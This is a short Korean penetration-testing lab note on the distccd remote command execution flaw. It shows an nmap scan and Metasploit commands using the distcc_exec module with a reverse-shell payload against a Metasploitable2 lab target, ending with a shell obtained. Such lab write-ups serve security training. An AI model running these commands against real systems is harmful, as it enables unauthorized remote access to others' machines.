[모의해킹 시스템 취약점] DistCCd 취약점

※ DistCCd(Distributed cc deamon)?

 네트워크를 통해 호스트가 참여하여 분산 컴파일 작업을 수행하도록 설계한 프로그램

 

1. 개요

distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 버전에서는 시스템에 동작중인 distccd 데몬에게 원격지에서 임의의 명령어를 보내 실행할 수 있는 보안 취약점이 존재한다. (port : 3632)

 

2. 공격 실습

→ msfconsole 에 exploit/unix/misc/distcc_exec 모듈로 존재한다.

 

공격자(KaliLinux) : 192.168.10.50

공격 대상(MetasploitableV2 Linux) : 192.168.10.134

 

[KaliLinux]

㉮ 공격대상 시스템 스캔한다.

# nmap -sV -p 3632 192.168.10.134

㉯ msfconsole 을 이용하여 공격을 시도한다.

# msfconsole -q

msf6 > use exploit/unix/misc/distcc_exec 

msf6 > set RHOSTS 192.168.10.134

msf6 > set payload cmd/unix/reverse

msf6 > set LHOST 192.168.10.50

msf6 > run

공격 결과 shell을 얻는데 성공했지만 root 권한으로의 상승 작업이 별도로 필요하다.